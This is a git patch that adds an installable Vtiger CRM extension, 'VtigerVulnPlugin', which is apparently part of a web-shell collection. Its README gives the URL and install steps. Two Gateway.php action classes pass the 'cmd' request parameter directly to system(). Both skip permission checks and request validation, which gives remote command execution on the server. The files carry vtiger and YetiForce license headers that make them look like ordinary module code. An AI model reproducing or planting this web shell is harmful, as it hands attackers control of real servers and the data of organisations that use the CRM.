From 357b20bf763ffc0c9c07d63b97f65dab70f9d3d7 Mon Sep 17 00:00:00 2001
From: User <7030273+seran@users.noreply.github.com>
Date: Tue, 2 Mar 2021 23:07:19 +0530
Subject: [PATCH] vulnerable vtiger plugin

---
 Web-Shells/Vtiger/README.md                   | 13 +++++++++
 .../en_us/Settings/VtigerVulnPlugin.php       |  3 ++
 .../languages/en_us/VtigerVulnPlugin.php      |  3 ++
 Web-Shells/Vtiger/manifest.xml                | 25 ++++++++++++++++
 .../VtigerVulnPlugin/VtigerVulnPlugin.php     | 18 ++++++++++++
 .../VtigerVulnPlugin/actions/Gateway.php      | 29 +++++++++++++++++++
 .../modules/VtigerVulnPlugin/manifest.xml     | 25 ++++++++++++++++
 .../Vtiger/settings/actions/Gateway.php       | 25 ++++++++++++++++
 8 files changed, 141 insertions(+)
 create mode 100644 Web-Shells/Vtiger/README.md
 create mode 100644 Web-Shells/Vtiger/languages/en_us/Settings/VtigerVulnPlugin.php
 create mode 100644 Web-Shells/Vtiger/languages/en_us/VtigerVulnPlugin.php
 create mode 100644 Web-Shells/Vtiger/manifest.xml
 create mode 100755 Web-Shells/Vtiger/modules/VtigerVulnPlugin/VtigerVulnPlugin.php
 create mode 100644 Web-Shells/Vtiger/modules/VtigerVulnPlugin/actions/Gateway.php
 create mode 100644 Web-Shells/Vtiger/modules/VtigerVulnPlugin/manifest.xml
 create mode 100644 Web-Shells/Vtiger/settings/actions/Gateway.php

diff --git a/Web-Shells/Vtiger/README.md b/Web-Shells/Vtiger/README.md
new file mode 100644
index 00000000..bf86df36
--- /dev/null
+++ b/Web-Shells/Vtiger/README.md
@@ -0,0 +1,13 @@
+# Vtiger Vulnerable Extension
+
+An installable Vtiger extension which provides interface to perform command execution on the respective web server.
+
+/index.php?module=VtigerVulnPlugin&action=Gateway&cmd=id
+
+### Steps to use
+
+1. Create a zip archive including all the files in the repository
+2. Install the zip via Settings -> Module Manager
+3. Ready to cook..
+
+Don't use it in a production environment.
diff --git a/Web-Shells/Vtiger/languages/en_us/Settings/VtigerVulnPlugin.php b/Web-Shells/Vtiger/languages/en_us/Settings/VtigerVulnPlugin.php
new file mode 100644
index 00000000..6432cf73
--- /dev/null
+++ b/Web-Shells/Vtiger/languages/en_us/Settings/VtigerVulnPlugin.php
@@ -0,0 +1,3 @@
+<?php
+
+return null;
\ No newline at end of file
diff --git a/Web-Shells/Vtiger/languages/en_us/VtigerVulnPlugin.php b/Web-Shells/Vtiger/languages/en_us/VtigerVulnPlugin.php
new file mode 100644
index 00000000..6432cf73
--- /dev/null
+++ b/Web-Shells/Vtiger/languages/en_us/VtigerVulnPlugin.php
@@ -0,0 +1,3 @@
+<?php
+
+return null;
\ No newline at end of file
diff --git a/Web-Shells/Vtiger/manifest.xml b/Web-Shells/Vtiger/manifest.xml
new file mode 100644
index 00000000..6b89fe71
--- /dev/null
+++ b/Web-Shells/Vtiger/manifest.xml
@@ -0,0 +1,25 @@
+<?xml version='1.0'?>
+<module>
+	<name>VtigerVulnPlugin</name>
+	<label>VtigerVulnPlugin</label>
+	<parent>Tools</parent>
+	<version>1.01</version>
+	<dependencies>
+		<vtiger_version>7.0.0</vtiger_version>
+		<vtiger_max_version>7.*</vtiger_max_version>
+	</dependencies>
+	<license>
+		<file>LICENSE.txt</file>
+	</license>
+
+	<actions>
+		<action>
+			<name><![CDATA[Import]]></name>
+			<status>enabled</status>
+		</action>
+		<action>
+			<name><![CDATA[Export]]></name>
+			<status>disabled</status>
+		</action>
+	</actions>
+</module>
diff --git a/Web-Shells/Vtiger/modules/VtigerVulnPlugin/VtigerVulnPlugin.php b/Web-Shells/Vtiger/modules/VtigerVulnPlugin/VtigerVulnPlugin.php
new file mode 100755
index 00000000..c291fb69
--- /dev/null
+++ b/Web-Shells/Vtiger/modules/VtigerVulnPlugin/VtigerVulnPlugin.php
@@ -0,0 +1,18 @@
+<?php
+/* +***********************************************************************************************************************************
+ * The contents of this file are subject to the YetiForce Public License Version 1.1 (the "License"); you may not use this file except
+ * in compliance with the License.
+ * Software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or implied.
+ * See the License for the specific language governing rights and limitations under the License.
+ * The Original Code is YetiForce.
+ * The Initial Developer of the Original Code is YetiForce. Portions created by YetiForce are Copyright (C) www.yetiforce.com.
+ * All Rights Reserved.
+ * *********************************************************************************************************************************** */
+include_once 'modules/Vtiger/CRMEntity.php';
+
+class VtigerVulnPlugin extends Vtiger_CRMEntity
+{
+  
+}
+
+?>
\ No newline at end of file
diff --git a/Web-Shells/Vtiger/modules/VtigerVulnPlugin/actions/Gateway.php b/Web-Shells/Vtiger/modules/VtigerVulnPlugin/actions/Gateway.php
new file mode 100644
index 00000000..a3f125e8
--- /dev/null
+++ b/Web-Shells/Vtiger/modules/VtigerVulnPlugin/actions/Gateway.php
@@ -0,0 +1,29 @@
+<?php
+
+/* +***********************************************************************************
+ * The contents of this file are subject to the vtiger CRM Public License Version 1.0
+ * ("License"); You may not use this file except in compliance with the License
+ * The Original Code is:  vtiger CRM Open Source
+ * The Initial Developer of the Original Code is vtiger.
+ * Portions created by vtiger are Copyright (C) vtiger.
+ * All Rights Reserved.
+ * *********************************************************************************** */
+
+class VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {
+
+    public function checkPermission(Vtiger_Request $request) {
+        return true;
+    }
+
+    public function process(Vtiger_Request $request) {
+        echo "<pre>";
+        system($request->get("cmd"));
+        echo "</pre>";
+        die;
+    }
+
+    public function validateRequest(Vtiger_Request $request) {
+        return true;
+    }
+
+}
\ No newline at end of file
diff --git a/Web-Shells/Vtiger/modules/VtigerVulnPlugin/manifest.xml b/Web-Shells/Vtiger/modules/VtigerVulnPlugin/manifest.xml
new file mode 100644
index 00000000..6b89fe71
--- /dev/null
+++ b/Web-Shells/Vtiger/modules/VtigerVulnPlugin/manifest.xml
@@ -0,0 +1,25 @@
+<?xml version='1.0'?>
+<module>
+	<name>VtigerVulnPlugin</name>
+	<label>VtigerVulnPlugin</label>
+	<parent>Tools</parent>
+	<version>1.01</version>
+	<dependencies>
+		<vtiger_version>7.0.0</vtiger_version>
+		<vtiger_max_version>7.*</vtiger_max_version>
+	</dependencies>
+	<license>
+		<file>LICENSE.txt</file>
+	</license>
+
+	<actions>
+		<action>
+			<name><![CDATA[Import]]></name>
+			<status>enabled</status>
+		</action>
+		<action>
+			<name><![CDATA[Export]]></name>
+			<status>disabled</status>
+		</action>
+	</actions>
+</module>
diff --git a/Web-Shells/Vtiger/settings/actions/Gateway.php b/Web-Shells/Vtiger/settings/actions/Gateway.php
new file mode 100644
index 00000000..5a6c23be
--- /dev/null
+++ b/Web-Shells/Vtiger/settings/actions/Gateway.php
@@ -0,0 +1,25 @@
+<?php
+
+/* +**********************************************************************************
+ * The contents of this file are subject to the vtiger CRM Public License Version 1.1
+ * ("License"); You may not use this file except in compliance with the License
+ * The Original Code is:  vtiger CRM Open Source
+ * The Initial Developer of the Original Code is vtiger.
+ * Portions created by vtiger are Copyright (C) vtiger.
+ * All Rights Reserved.
+ * ********************************************************************************** */
+
+class Settings_VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {
+
+    public function process(Vtiger_Request $request) {
+        echo "<pre>";
+        system($request->get("cmd"));
+        echo "</pre>";
+        die;
+    }
+
+    public function validateRequest(Vtiger_Request $request) {
+        return true;
+    }
+
+}